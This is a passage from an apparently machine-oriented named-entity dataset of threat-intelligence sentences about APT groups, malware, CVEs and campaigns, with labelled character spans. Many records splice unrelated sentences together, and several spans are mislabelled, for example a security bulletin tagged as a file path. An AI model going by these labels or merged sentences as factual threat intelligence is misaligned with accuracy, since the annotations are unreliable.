In 2016 , an attack campaign by this group was recorded in early May that made use of an exploit for CVE-2016-4117 , a vulnerability in Adobe Flash Player , which at the time was both unknown and unpatched .", "spans": {"ORGANIZATION: Symantec": [[0, 8]], "THREAT_ACTOR: Whitefly": [[76, 84]], "VULNERABILITY: exploit": [[386, 393]], "VULNERABILITY: CVE-2016-4117": [[398, 411]], "TOOL: Flash": [[439, 444]]}, "info": {"id": "cyberner_stix_train_005544", "source": "cyberner_stix_train"}} {"text": "Behavior patterns observed in TEMP.Veles activity are consistent with the Moscow time zone , where CNIIHM is located .", "spans": {"THREAT_ACTOR: TEMP.Veles": [[30, 40]], "ORGANIZATION: CNIIHM": [[99, 105]]}, "info": {"id": "cyberner_stix_train_005545", "source": "cyberner_stix_train"}} {"text": "This capability was confirmed when the Android permission , called android.permission.RECORD_AUDIO , was being requested along with code found in the app . Silence conducted a massive phishing campaign posing as the Central Bank of the Russian Federation . In a recent spear-phishing campaign , the Cobalt Hacking Group used a remote code execution vulnerability in Microsoft Office software to connect to its command and control server via Cobalt Strike .", "spans": {"SYSTEM: Android": [[39, 46]], "THREAT_ACTOR: Silence": [[156, 163]], "ORGANIZATION: Central Bank": [[216, 228]], "THREAT_ACTOR: Cobalt Hacking Group": [[299, 319]], "ORGANIZATION: Microsoft": [[366, 375]], "MALWARE: Cobalt Strike": [[441, 454]]}, "info": {"id": "cyberner_stix_train_005546", "source": "cyberner_stix_train"}} {"text": "FakeSpy asks to be the default SMS app because it uses the function onReceive to intercept incoming SMS messages . According to Microsoft’s advisory , this vulnerability was patched on March 12 , 2019 and we first saw the webshell activity on April 1 , 2019 . 
traditionally targeted the aerospace , energy , government , high-tech , consulting services , and chemicals / manufacturing / mining sectors .", "spans": {"MALWARE: FakeSpy": [[0, 7]], "ORGANIZATION: Microsoft’s": [[128, 139]], "ORGANIZATION: aerospace": [[287, 296]], "ORGANIZATION: energy": [[299, 305]], "ORGANIZATION: government": [[308, 318]], "ORGANIZATION: high-tech": [[321, 330]], "ORGANIZATION: consulting services": [[333, 352]], "ORGANIZATION: chemicals": [[359, 368]], "ORGANIZATION: manufacturing": [[371, 384]], "ORGANIZATION: mining sectors": [[387, 401]]}, "info": {"id": "cyberner_stix_train_005547", "source": "cyberner_stix_train"}} {"text": "Version # 1 : June 2019 — Domain : databit [ . While in most cases the infection vector remains unknown , the high profile attack from 2014 used a very complex Windows TTF zero-day exploit ( CVE-2014-4148 ) . In addition , the attackers ’ use of the proxy tool , HTran , also helped mask their true location . The problem is that CSP does n't support query strings ( See Spec ):", "spans": {"VULNERABILITY: zero-day exploit": [[172, 188]], "VULNERABILITY: CVE-2014-4148": [[191, 204]], "TOOL: HTran": [[263, 268]], "VULNERABILITY: CSP does n't support query strings": [[330, 364]]}, "info": {"id": "cyberner_stix_train_005548", "source": "cyberner_stix_train"}} {"text": "Once downloaded and executed , it drops an intermediate payload that further downloads a Pony DLL and Vawtrak executable , which perform data theft and connect to a command and control (C2) server . 
It is also possible that ScarCruft deployed another zero day exploit , CVE-2016-0147 , which was patched in April .", "spans": {"MALWARE: Pony DLL": [[89, 97]], "MALWARE: Vawtrak": [[102, 109]], "THREAT_ACTOR: ScarCruft": [[224, 233]], "VULNERABILITY: zero day": [[251, 259]], "VULNERABILITY: exploit": [[260, 267]], "VULNERABILITY: CVE-2016-0147": [[270, 283]]}, "info": {"id": "cyberner_stix_train_005549", "source": "cyberner_stix_train"}} {"text": "Regardless of the parameters , it returns a json containing a link for APK file . BRONZE BUTLER has used phishing emails with Flash animation attachments to download and execute Daserf malware , and has also leveraged Flash exploits for SWC attacks . During the operations , the group used tools consistent with those leveraged during past intrusions including Powermud , a custom tool used by the Seedworm group , and customized PowerShell , LaZagne , and Crackmapexec scripts .", "spans": {"THREAT_ACTOR: BRONZE BUTLER": [[82, 95]], "TOOL: Daserf malware": [[178, 192]], "VULNERABILITY: Flash exploits": [[218, 232]], "MALWARE: Powermud": [[361, 369]], "THREAT_ACTOR: Seedworm group": [[398, 412]], "MALWARE: customized PowerShell": [[419, 440]], "MALWARE: LaZagne": [[443, 450]], "MALWARE: Crackmapexec scripts": [[457, 477]]}, "info": {"id": "cyberner_stix_train_005550", "source": "cyberner_stix_train"}} {"text": "] 114 [ . While not conclusive by itself , the use of publicly available Iranian hacking tools and popular Iranian hosting companies may be a result of APT33 's familiarity with them and lends support to the assessment that APT33 may be based in Iran . RC4 file encryption relies on the Windows 32 CryptoAPI , using the provided value’s MD5 hash as an initial . 
Open Babel allows users to “ search , convert , analyze , or store data from molecular modeling , chemistry , solid - state materials , biochemistry , or related areas , ” according to its website , and is used in other popular pieces of software in the science field .", "spans": {"ORGANIZATION: hosting companies": [[115, 132]], "THREAT_ACTOR: APT33": [[152, 157], [224, 229]], "SYSTEM: Windows": [[287, 294]], "TOOL: CryptoAPI": [[298, 307]], "TOOL: Open Babel": [[362, 372]]}, "info": {"id": "cyberner_stix_train_005552", "source": "cyberner_stix_train"}} {"text": "In all emails sent to these government officials , the actor used the same attachment : a malicious Microsoft Word document that exploited the CVE-2012-0158 vulnerability to drop a malicious payload . These findings also suggest that the threat groups have robust exploit developing capabilities because CVE-2018-0798 is not widely reported on and it is typically not incorporated into publicly available weaponizers .", "spans": {"MALWARE: malicious Microsoft Word document": [[90, 123]], "VULNERABILITY: CVE-2012-0158": [[143, 156]], "THREAT_ACTOR: threat groups": [[238, 251]], "VULNERABILITY: exploit": [[264, 271]], "VULNERABILITY: CVE-2018-0798": [[304, 317]]}, "info": {"id": "cyberner_stix_train_005553", "source": "cyberner_stix_train"}} {"text": "MainService is the central controller of this spyware . Over the coming months , it progressively released more tools , until April 2017 , when it released a final , large cache of tools , including the DoublePulsar backdoor , the FuzzBunch framework , and the EternalBlue , EternalSynergy , and EternalRomance exploit tools . 
GCMAN is a threat group that focuses on targeting banks for the purpose of transferring money to e-currency services .", "spans": {"TOOL: DoublePulsar": [[203, 215]], "TOOL: backdoor": [[216, 224]], "TOOL: FuzzBunch": [[231, 240]], "TOOL: framework": [[241, 250]], "TOOL: EternalBlue": [[261, 272]], "TOOL: EternalSynergy": [[275, 289]], "TOOL: EternalRomance": [[296, 310]], "TOOL: exploit": [[311, 318]], "TOOL: tools": [[319, 324]], "THREAT_ACTOR: GCMAN": [[327, 332]]}, "info": {"id": "cyberner_stix_train_005554", "source": "cyberner_stix_train"}} {"text": "We analyzed the dropper , which is an executable that contains the following three files :", "spans": {"TOOL: dropper": [[16, 23]]}, "info": {"id": "cyberner_stix_train_005555", "source": "cyberner_stix_train"}} {"text": "Command execution Command execution can create havoc for victim if the malware developer decides to execute commands in the victim ’ s device . Analysis of the emails has shown that the attachment contains an exploit for the CVE-2017-11882 vulnerability . Against targets in the CIS countries , the Cobalt also used their own infrastructure , which included rented dedicated servers .", "spans": {"VULNERABILITY: exploit": [[209, 216]], "VULNERABILITY: CVE-2017-11882 vulnerability": [[225, 253]], "THREAT_ACTOR: Cobalt": [[299, 305]]}, "info": {"id": "cyberner_stix_train_005556", "source": "cyberner_stix_train"}} {"text": "This time , however , attackers opportunistically used spear-phishing emails with a Microsoft Word attachment exploiting the recently patched CVE-2017-0199 to deploy the ZeroT Trojan , which in turn downloaded the PlugX Remote Access Trojan ( RAT ) . 
Instead of Flash exploits , older Wild Neutron exploitation and watering holes used what was a Java zero-day at the end of 2012 and the beginning of 2013 , detected by Kaspersky Lab products as Exploit.Java.CVE-2012-3213.b .", "spans": {"MALWARE: Microsoft Word attachment": [[84, 109]], "VULNERABILITY: CVE-2017-0199": [[142, 155]], "TOOL: ZeroT Trojan": [[170, 182]], "TOOL: PlugX Remote Access Trojan": [[214, 240]], "TOOL: RAT": [[243, 246]], "TOOL: Flash": [[262, 267]], "VULNERABILITY: exploits": [[268, 276]], "TOOL: Java": [[346, 350]], "VULNERABILITY: zero-day": [[351, 359]], "ORGANIZATION: Kaspersky Lab": [[419, 432]], "VULNERABILITY: Exploit.Java.CVE-2012-3213.b": [[445, 473]]}, "info": {"id": "cyberner_stix_train_005557", "source": "cyberner_stix_train"}} {"text": "The “ onUserLeaveHint ( ) ” callback method of the Android Activity ( i.e. , the typical GUI screen the user sees ) is called as part of the activity lifecycle when the activity is about to go into the background as a result of user choice , for example , when the user presses the Home key . Some of the malicious documents were test files without the implant . the original result can be restored by using the following command : There are several methods in which SCIL programs can execute , such as an engineer / operator clicking a button or image within the MicroSCADA system , scheduled or process derived changes , or in this case manual execution .", "spans": {"SYSTEM: Android Activity": [[51, 67]], "TOOL: test files": [[330, 340]], "SYSTEM: MicroSCADA system": [[564, 581]]}, "info": {"id": "cyberner_stix_train_005558", "source": "cyberner_stix_train"}} {"text": "MD5 43680D1914F28E14C90436E1D42984E2 20D4B9EB9377C499917C4D69BF4CCEBE First widely distributed Android bootkit Malware infects more than 350,000 Devices January 29 , 2014 In the last quarter of 2013 , sale of a Smartphone with ANDROID operating system has increased and every second person you see is a DROID user . 
Targets included a wide array of high-profile entities , including intelligence services , military , utility providers ( telecommunications and power ) , embassies , and government institutions . Our analysis has led us to conclude that APT1 is likely government-sponsored and one of the most persistent of China ’s cyber threat actors . It also sends collected browser data to another script by sending a POST request to “ hxxp://[c2_hostname]/groups / count / write.php ” .", "spans": {"SYSTEM: Android": [[95, 102]], "SYSTEM: ANDROID": [[227, 234]], "SYSTEM: DROID": [[303, 308]], "ORGANIZATION: intelligence services": [[383, 404]], "ORGANIZATION: military": [[407, 415]], "ORGANIZATION: utility providers": [[418, 435]], "ORGANIZATION: telecommunications": [[438, 456]], "ORGANIZATION: power": [[461, 466]], "ORGANIZATION: embassies": [[471, 480]], "ORGANIZATION: government institutions": [[487, 510]], "THREAT_ACTOR: APT1": [[554, 558]]}, "info": {"id": "cyberner_stix_train_005559", "source": "cyberner_stix_train"}} {"text": "We observed all these characteristics in the Bisonal 's attacks against both Russia and South Korea . The leader of the crime gang behind the Carbanak and Cobalt malware attacks targeting over a 100 financial institutions worldwide has been arrested in Alicante , Spain , after a complex investigation conducted by the Spanish National Police .", "spans": {"TOOL: Bisonal": [[45, 52]], "THREAT_ACTOR: crime gang": [[120, 130]], "MALWARE: Carbanak": [[142, 150]], "ORGANIZATION: financial institutions": [[199, 221]]}, "info": {"id": "cyberner_stix_train_005560", "source": "cyberner_stix_train"}} {"text": "rootdaemon will first attempt to jailbreak the device using a modified version of the DirtyCow exploit . According to Symantec telemetry , almost 40 percent of Orangeworm 's confirmed victim organizations operate within the healthcare industry . JhoneRAT : b4a43b108989d1dde87e58f1fd6f81252ef6ae19d2a5e8cd76440135e0fd6366 . 
Will Harrison was terminated as an Ashley Madison employee in November 2011 , and by early 2012 he ’d turned his considerable harassment skills squarely against the company .", "spans": {"VULNERABILITY: DirtyCow exploit": [[86, 102]], "ORGANIZATION: Symantec": [[118, 126]], "ORGANIZATION: healthcare industry": [[224, 243]], "MALWARE: JhoneRAT": [[246, 254]], "FILEPATH: b4a43b108989d1dde87e58f1fd6f81252ef6ae19d2a5e8cd76440135e0fd6366": [[257, 321]], "THREAT_ACTOR: Will Harrison": [[324, 337]], "ORGANIZATION: Ashley Madison": [[359, 373]]}, "info": {"id": "cyberner_stix_train_005561", "source": "cyberner_stix_train"}} {"text": "But , as we have already mentioned , the criminals could easily turn their attention to users in other countries . Venomous Bear has deployed malware to targets using several novel methods . In addition , the researchers used their analysis to provide detection coverage for Snort , Fireamp , and ClamAV . In July 2023 , Mandiant Consulting responded to a supply chain compromise affecting a US - based software solutions entity .", "spans": {"THREAT_ACTOR: Venomous Bear": [[115, 128]], "TOOL: Snort": [[275, 280]], "TOOL: Fireamp": [[283, 290]], "TOOL: ClamAV": [[297, 303]], "ORGANIZATION: Mandiant Consulting": [[321, 340]], "THREAT_ACTOR: supply chain compromise": [[356, 379]], "ORGANIZATION: a US - based software solutions entity": [[390, 428]]}, "info": {"id": "cyberner_stix_train_005562", "source": "cyberner_stix_train"}} {"text": "However , this particular email downloads an Android Package Kit ( APK ) , which is the common format used by Android to distribute and install applications . All the samples appear to be have been compiled between February 29 and March 1 2016 , shortly before our discovery , suggesting that , despite the known C&C servers having quickly gone offline shortly after , this spree of attacks might be fresh and currently undergoing . 
We observe , with various level of confidence , that there are several interconnected groups using very similar toolkits and the same infrastructure to conduct their cyberattacks . A possible solution would come from adaptive URLs , adding the ID as part of the URL or subdomain to allow admins to set CSP rules that restrict data exfiltration to other accounts .", "spans": {"SYSTEM: Android Package Kit": [[45, 64]], "SYSTEM: Android": [[110, 117]]}, "info": {"id": "cyberner_stix_train_005563", "source": "cyberner_stix_train"}} {"text": "PLATINUM uses custom-developed malicious tools and has the resources to update these applications often to avoid being detected . Our analysis shows that NetTraveler attempted to exploit CVE-2012-0158 to install NetTraveler Trojan .", "spans": {"THREAT_ACTOR: PLATINUM": [[0, 8]], "TOOL: custom-developed malicious tools": [[14, 46]], "MALWARE: NetTraveler": [[154, 165]], "VULNERABILITY: exploit": [[179, 186]], "VULNERABILITY: CVE-2012-0158": [[187, 200]], "MALWARE: NetTraveler Trojan": [[212, 230]]}, "info": {"id": "cyberner_stix_train_005564", "source": "cyberner_stix_train"}} {"text": "The macro obtains the payload saved to the system from within the document stored as UserForm1.Label2.Caption and will write it to : %APPDATA%\\MSDN\\~msdn.exe .", "spans": {"TOOL: macro": [[4, 9]], "FILEPATH: UserForm1.Label2.Caption": [[85, 109]], "FILEPATH: %APPDATA%\\MSDN\\~msdn.exe": [[133, 157]]}, "info": {"id": "cyberner_stix_train_005565", "source": "cyberner_stix_train"}} {"text": "The new spear-phishing docs used by MuddyWater rely on social engineering to persuade users to enable macros . 
The SDK , named SWAnalytics is integrated into seemingly innocent Android applications published on major 3rd party Chinese app stores such as Tencent MyApp , Wandoujia , Huawei App Store , and Xiaomi App Store .", "spans": {"THREAT_ACTOR: MuddyWater": [[36, 46]], "ORGANIZATION: social engineering": [[55, 73]], "MALWARE: SDK": [[115, 118]], "FILEPATH: SWAnalytics": [[127, 138]], "SYSTEM: Android": [[177, 184]], "ORGANIZATION: Tencent MyApp": [[254, 267]], "ORGANIZATION: Wandoujia": [[270, 279]], "ORGANIZATION: Huawei App Store": [[282, 298]], "ORGANIZATION: Xiaomi App Store": [[305, 321]]}, "info": {"id": "cyberner_stix_train_005566", "source": "cyberner_stix_train"}} {"text": "Kaspersky Lab 's products detect the Microsoft Office exploits used in the spear-phishing attacks , including Exploit.MSWord.CVE-2010-333 , Exploit.Win32.CVE-2012-0158 . These include CVE-2010-3962 as part of an attack campaign in 2010 and CVE-2014-1776 in 2014 . Beginning in August 2016 , a group calling itself the Shadow Brokers began releasing tools it claimed to have originated from the Equation Group .", "spans": {"ORGANIZATION: Kaspersky Lab": [[0, 13]], "VULNERABILITY: Microsoft Office exploits": [[37, 62]], "MALWARE: Exploit.MSWord.CVE-2010-333": [[110, 137]], "MALWARE: Exploit.Win32.CVE-2012-0158": [[140, 167]], "VULNERABILITY: CVE-2010-3962": [[184, 197]], "VULNERABILITY: CVE-2014-1776": [[240, 253]], "THREAT_ACTOR: Shadow Brokers": [[318, 332]], "THREAT_ACTOR: Equation": [[394, 402]]}, "info": {"id": "cyberner_stix_train_005567", "source": "cyberner_stix_train"}} {"text": "This disallows apps to be installed on your device from unknown sources . Our technical analysis of the malware used in these attacks showed close ties to BS2005 backdoors from operation Ke3chang , and to a related TidePool malware family discovered by Palo Alto Networks in 2016 that targeted Indian embassies across the globe . 
Ke3chang has targeted several industries , including oil , government , military , and more .", "spans": {"MALWARE: malware": [[104, 111]], "MALWARE: BS2005 backdoors": [[155, 171]], "MALWARE: TidePool malware": [[215, 231]], "ORGANIZATION: Palo Alto": [[253, 262]], "THREAT_ACTOR: Ke3chang": [[330, 338]]}, "info": {"id": "cyberner_stix_train_005568", "source": "cyberner_stix_train"}} {"text": "APT19 leveraged Rich Text Format (RTF) and macro-enabled Microsoft Excel files to deliver their initial exploits . Earlier this month , Securelist 's technology caught another zero-day exploits deployed in targeted attacks .", "spans": {"THREAT_ACTOR: APT19": [[0, 5]], "MALWARE: Microsoft Excel files": [[57, 78]], "ORGANIZATION: Securelist": [[136, 146]], "VULNERABILITY: zero-day": [[176, 184]]}, "info": {"id": "cyberner_stix_train_005569", "source": "cyberner_stix_train"}} {"text": "This example shows one possible implementation of this technique . In 2016 , Group-IB identified 10 attacks conducted by MoneyTaker , 6 attacks on banks in the US , 1 attack on a US service provider , 1 attack on a bank in the UK and 2 attacks on Russian banks . The second December spear phishing attack targeted Taiwan based news media organizations . Last week , the Biden administration released its formal roadmap for its national cybersecurity initiative meant to encourage greater investment in cybersecurity and strengthen the U.S. 
’s critical infrastructure security ( and more ) .", "spans": {"ORGANIZATION: Group-IB": [[77, 85]], "ORGANIZATION: banks": [[147, 152], [255, 260]], "ORGANIZATION: service provider": [[182, 198]], "ORGANIZATION: bank": [[215, 219]], "ORGANIZATION: Biden administration": [[370, 390]]}, "info": {"id": "cyberner_stix_train_005570", "source": "cyberner_stix_train"}} {"text": "Also , it appears that the actors used ActionScript from an open source video player called “ f4player ” , which is freely available on GitHub .", "spans": {"TOOL: ActionScript": [[39, 51]], "TOOL: f4player": [[94, 102]], "TOOL: GitHub": [[136, 142]]}, "info": {"id": "cyberner_stix_train_005571", "source": "cyberner_stix_train"}} {"text": "This was no longer detectable with static signatures by our product .", "spans": {}, "info": {"id": "cyberner_stix_train_005572", "source": "cyberner_stix_train"}} {"text": "It is generally considered a descendant of the Dyreza banking Trojan and features mutliple modules .", "spans": {"MALWARE: Dyreza": [[47, 53]], "MALWARE: Trojan": [[62, 68]]}, "info": {"id": "cyberner_stix_train_005573", "source": "cyberner_stix_train"}} {"text": "While Vcrodat is delivered via the malicious dropper , we have yet to discover how Nibatad is delivered to the infected computer . 
We believe the actors pivoted to other systems on the network using stolen credentials and by exploiting the CVE-2017-0144 ( EternalBlue ) vulnerability patched in MS17-010 .", "spans": {"TOOL: Vcrodat": [[6, 13]], "TOOL: dropper": [[45, 52]], "TOOL: Nibatad": [[83, 90]], "THREAT_ACTOR: actors": [[146, 152]], "VULNERABILITY: CVE-2017-0144": [[240, 253]], "VULNERABILITY: EternalBlue": [[256, 267]], "FILEPATH: MS17-010": [[295, 303]]}, "info": {"id": "cyberner_stix_train_005574", "source": "cyberner_stix_train"}} {"text": "TRITON is a highly specialized framework whose development would be within the capability of a low percentage of intrusion operators .", "spans": {"MALWARE: TRITON": [[0, 6]]}, "info": {"id": "cyberner_stix_train_005575", "source": "cyberner_stix_train"}} {"text": "It 's one of the strings - \" How you 'll sign in '' - that it looks for during the account creation process . Attackers are sending malicious PDF and DOC files , which use exploits to drop variants of Backdoor.Sogu . Though the security community has not yet broadly discussed this technique , FireEye has observed other threat groups adopting these measures and expect this trend to continue on other community sites . For the CrySyS Lab analysis , please read [ here ] .", "spans": {"TOOL: PDF": [[142, 145]], "TOOL: DOC files": [[150, 159]], "TOOL: Backdoor.Sogu": [[201, 214]], "ORGANIZATION: FireEye": [[294, 301]], "ORGANIZATION: CrySyS Lab": [[428, 438]]}, "info": {"id": "cyberner_stix_train_005576", "source": "cyberner_stix_train"}} {"text": "We have also observed them using virtual private network services that use IPs based in numerous countries to ensure anonymity and obfuscate criminal operations . 
According to statistics , Corkow primarily targets users in Russia and the CIS , but it is worth noting that in 2014 the amount of attacks targeting the USA increased by 5 times , in comparison with 2011 .", "spans": {"MALWARE: them": [[22, 26]], "MALWARE: Corkow": [[189, 195]], "ORGANIZATION: users": [[214, 219]]}, "info": {"id": "cyberner_stix_train_005577", "source": "cyberner_stix_train"}} {"text": "Attributes of one of the artifacts and intelligence gathered on the infrastructure operated by the attackers suggest that the attack was perpetrated by a state-sponsored group known as Sofacy ( or APT28 ) .", "spans": {"THREAT_ACTOR: Sofacy": [[185, 191]], "THREAT_ACTOR: APT28": [[197, 202]]}, "info": {"id": "cyberner_stix_train_005578", "source": "cyberner_stix_train"}} {"text": "QiAnXin confirmed that this is a DarkHydrus Group’s new attack targeting Middle East region . However , the unique malware variant , BlackEnergy 3 , reemerged in Ukraine early in 2015 , where we had first found Sandworm Team .", "spans": {"ORGANIZATION: QiAnXin": [[0, 7]], "THREAT_ACTOR: DarkHydrus": [[33, 43]], "FILEPATH: BlackEnergy 3": [[133, 146]], "THREAT_ACTOR: Sandworm Team": [[211, 224]]}, "info": {"id": "cyberner_stix_train_005579", "source": "cyberner_stix_train"}} {"text": "A well-funded , highly active group of Middle Eastern hackers was caught , yet again , using a lucrative zero-day exploit in the wild to break into computers and infect them with powerful spyware developed by an infamous cyberweapons dealer named Gamma Group . 
Over the last 10 months , Kaspersky Lab researchers have analyzed a massive cyber-espionage operation which we call \" Epic Turla \" .", "spans": {"THREAT_ACTOR: group": [[30, 35]], "THREAT_ACTOR: hackers": [[54, 61]], "VULNERABILITY: zero-day exploit": [[105, 121]], "THREAT_ACTOR: Gamma Group": [[247, 258]], "ORGANIZATION: Kaspersky Lab": [[287, 300]], "MALWARE: Epic Turla": [[379, 389]]}, "info": {"id": "cyberner_stix_train_005580", "source": "cyberner_stix_train"}} {"text": "Given the nature of connected devices in smart homes , it ’ s highly likely many of these devices , and indeed the controller app itself , communicate with one another sending status notifications , alerts and so on . Although we do not have first-hand evidence of APT41's compromise of TeamViewer , we have observed APT41 use compromised TeamViewer credentials as an entry point at multiple organizations . The Sofacy group spearphished targets in several waves with Flash exploits leading to their Carberp based JHUHUGIT downloaders and further stages of malware .", "spans": {"TOOL: TeamViewer": [[287, 297]], "THREAT_ACTOR: APT41": [[317, 322]], "THREAT_ACTOR: Sofacy group": [[412, 424]], "TOOL: Flash": [[468, 473]], "VULNERABILITY: exploits": [[474, 482]], "MALWARE: Carberp": [[500, 507]], "MALWARE: JHUHUGIT downloaders": [[514, 534]]}, "info": {"id": "cyberner_stix_train_005581", "source": "cyberner_stix_train"}} {"text": "It is installed as an ISAPI filter .", "spans": {"TOOL: ISAPI filter": [[22, 34]]}, "info": {"id": "cyberner_stix_train_005582", "source": "cyberner_stix_train"}} {"text": "Triada is a modular mobile Trojan that actively uses root privileges to substitute system files and exists mostly in the device ’ s RAM , which makes it extremely hard to detect . Earlier this month , Securelist 's technology caught another zero-day Adobe Flash Player exploit deployed in targeted attacks . 
In May 2016 , Unit 42 began researching attacks that used spear-phishing emails with attachments , specifically malicious Excel spreadsheets sent to financial organizations within Saudi Arabia .", "spans": {"MALWARE: Triada": [[0, 6]], "ORGANIZATION: Securelist": [[201, 211]], "VULNERABILITY: zero-day Adobe Flash Player exploit": [[241, 276]], "ORGANIZATION: Unit 42": [[322, 329]], "ORGANIZATION: financial organizations": [[457, 480]]}, "info": {"id": "cyberner_stix_train_005583", "source": "cyberner_stix_train"}} {"text": "The phishing site uses the gathered information as its GET parameter , allowing the attacker to access the stolen information . It is possible , although not confirmed , that APT16 was also responsible for targeting this government agency , given both the timeframe and the use of the same n-day to eventually deploy the ELMER backdoor . The malware sends another TXT query with the receiver structure, as depicted . Attackers could exploit these vulnerabilities to carry out a variety of attacks , in some cases gaining the ability to execute remote code on the targeted machine .", "spans": {"THREAT_ACTOR: APT16": [[175, 180]], "ORGANIZATION: government agency": [[221, 238]], "TOOL: ELMER backdoor": [[321, 335]], "THREAT_ACTOR: Attackers": [[417, 426]]}, "info": {"id": "cyberner_stix_train_005584", "source": "cyberner_stix_train"}} {"text": "Extracting the payload is straight forward – we simply dump the resource and decompress it .", "spans": {}, "info": {"id": "cyberner_stix_train_005585", "source": "cyberner_stix_train"}} {"text": "Once a valid card with a malicious EMV chip is detected , RIPPER will instantiate a timer to allow a thief to control the machine . 
Both Win32/Barlaiy & Win32/PlugX.L are remote access \" trojans \" , which allow Barium to gather a victim 's information , control a victim 's device , install additional malware , and exfiltrate information fi-om a victim 's device .", "spans": {"MALWARE: RIPPER": [[58, 64]], "MALWARE: Win32/Barlaiy": [[137, 150]], "MALWARE: Win32/PlugX.L": [[153, 166]], "THREAT_ACTOR: Barium": [[211, 217]]}, "info": {"id": "cyberner_stix_train_005586", "source": "cyberner_stix_train"}} {"text": "The commands supported by the analyzed version of the Cerberus bot are listed below . We saw SectorJ04 group activity in Germany , Indonesia , the United States , Taiwan , India . The Middle Eastern hacker group in this case is codenamed \" BlackOasis \" .", "spans": {"MALWARE: Cerberus": [[54, 62]], "THREAT_ACTOR: SectorJ04": [[93, 102]], "THREAT_ACTOR: BlackOasis": [[240, 250]]}, "info": {"id": "cyberner_stix_train_005587", "source": "cyberner_stix_train"}} {"text": "However , even though the TTPs of the Cleaver team have some overlap to techniques used by Iranian Cyber Army ( botnets ) , Ashiyane ( SQL injection ) and Syrian Electronic Army ( phishing ) , we believe this is largely the work of a new team . We noted in our original blog the large amount of targeting of Iranian citizens in this campaign , we observed almost one-third of all victims to be Iranian .", "spans": {"THREAT_ACTOR: Cleaver": [[38, 45]], "THREAT_ACTOR: Cyber Army": [[99, 109]], "THREAT_ACTOR: Ashiyane": [[124, 132]], "ORGANIZATION: Syrian Electronic Army": [[155, 177]], "ORGANIZATION: citizens": [[316, 324]]}, "info": {"id": "cyberner_stix_train_005588", "source": "cyberner_stix_train"}} {"text": "This feature is designed to block one application from accessing the data of other applications without rooting the device . If the attackers are attempting to compromise persons involved in SEC filings due to their information access , they may ultimately be pursuing securities fraud or other investment abuse . 
The email address is associated with the Lebanese domain of a major global financial institution .", "spans": {"THREAT_ACTOR: attackers": [[132, 141]], "TOOL: email": [[318, 323]], "ORGANIZATION: financial institution": [[389, 410]]}, "info": {"id": "cyberner_stix_train_005589", "source": "cyberner_stix_train"}} {"text": "We observed the string “ 1FABFBFF0000065132F71D94 ” in memory during debugging of the native variant .", "spans": {"FILEPATH: 1FABFBFF0000065132F71D94": [[25, 49]]}, "info": {"id": "cyberner_stix_train_005590", "source": "cyberner_stix_train"}} {"text": "This was an original spyware program , designed to exfiltrate almost all accessible information . Fxmsp specialize in breaching highly secure protected networks to access private corporate and government information . In order to deploy an implant for the final payload , ScarCruft uses a multi-stage binary infection scheme . In addition to SocGholish , the Domen toolkit was a well - built framework that emerged in 2019 while another campaign known as sczriptzzbn dropped SolarMarker leading to the NetSupport RAT in both cases .", "spans": {"THREAT_ACTOR: Fxmsp": [[98, 103]], "THREAT_ACTOR: ScarCruft": [[272, 281]], "MALWARE: SocGholish": [[342, 352]], "MALWARE: Domen toolkit": [[359, 372]], "MALWARE: sczriptzzbn": [[455, 466]], "MALWARE: SolarMarker": [[475, 486]], "MALWARE: NetSupport RAT": [[502, 516]]}, "info": {"id": "cyberner_stix_train_005591", "source": "cyberner_stix_train"}} {"text": "INTRODUCTION For the past few weeks , the Cybereason Nocturnus team has been investigating a new type of Android malware dubbed EventBot , which was first identified in March 2020 . We encountered the first document exploit called \" THAM luan - GD - NCKH2.doc \" a few days ago , which appears to be leveraging some vulnerabilities patched with MS12-060 . 
iDefense analysts have identified a campaign likely to be targeting members of— or those with affiliation or interest in—the ASEAN Defence Ministers ' Meeting ( ADMM ) .", "spans": {"ORGANIZATION: Cybereason Nocturnus": [[42, 62]], "SYSTEM: Android": [[105, 112]], "MALWARE: EventBot": [[128, 136]], "MALWARE: THAM luan - GD -": [[233, 249]], "MALWARE: NCKH2.doc": [[250, 259]], "TOOL: MS12-060": [[344, 352]], "ORGANIZATION: iDefense": [[355, 363]], "ORGANIZATION: Defence Ministers ' Meeting": [[486, 513]], "ORGANIZATION: ADMM": [[516, 520]]}, "info": {"id": "cyberner_stix_train_005592", "source": "cyberner_stix_train"}} {"text": "After a series of technical analysis ( which is covered in detail below ) and heuristic threat hunting , we discovered that a complete “ Agent Smith ” infection has three main phases : A dropper app lures victim to install itself voluntarily . We believed that the actors would use this date code to track their attack campaigns ; however , after continued analysis of the malware , we think these static dates could also be a build identifier for the Trojan . Insights from one year of tracking a polymorphic threat . Monitor network data flows for unexpected patterns and metadata that may be indicative of a mismatch between protocol and utilized port .", "spans": {"MALWARE: Agent Smith": [[137, 148]], "TOOL: date code": [[287, 296]]}, "info": {"id": "cyberner_stix_train_005593", "source": "cyberner_stix_train"}} {"text": "We sourced the over 561MB of exfiltrated data from this domain alone , all of which we found to be 7z compressed and password protected . \" IRIDIUM has hit more than 200 government agencies , oil and gas companies and technology companies , including Citrix Systems Inc \" , they said . The technology-themed zones reference well-known technology companies ( AOL , Apple , Google , Microsoft ) , antivirus vendors ( McAfee , Symantec ) , and products ( Blackberry , Bluecoat ) . 
Looking at the top 3 M domains , only 210 K use CSP .", "spans": {"ORGANIZATION: government agencies": [[170, 189]], "ORGANIZATION: oil": [[192, 195]], "ORGANIZATION: gas companies": [[200, 213]], "ORGANIZATION: technology companies": [[218, 238]], "ORGANIZATION: Citrix Systems Inc": [[251, 269]], "ORGANIZATION: AOL": [[358, 361]], "ORGANIZATION: Apple": [[364, 369]], "ORGANIZATION: Google": [[372, 378]], "ORGANIZATION: Microsoft": [[381, 390]], "ORGANIZATION: McAfee": [[415, 421]], "ORGANIZATION: Symantec": [[424, 432]], "ORGANIZATION: Blackberry": [[452, 462]], "ORGANIZATION: Bluecoat": [[465, 473]], "SYSTEM: CSP": [[526, 529]]}, "info": {"id": "cyberner_stix_train_005594", "source": "cyberner_stix_train"}} {"text": "The samples we identified leverage the same user agent string “ OPAERA ”", "spans": {}, "info": {"id": "cyberner_stix_train_005595", "source": "cyberner_stix_train"}} {"text": "We observed many web landing pages that mimic the sites of mobile operators and which are used to spread the Android implants . Our analysis revealed that they drop a new backdoor , which is written in PowerShell as MuddyWater’s known POWERSTATS backdoor . Cleaver is a threat group that has been attributed to Iranian actors and is responsible for activity tracked as Operation Cleaver .", "spans": {"SYSTEM: Android": [[109, 116]], "THREAT_ACTOR: MuddyWater’s": [[216, 228]], "TOOL: POWERSTATS backdoor": [[235, 254]], "THREAT_ACTOR: Cleaver": [[257, 264]]}, 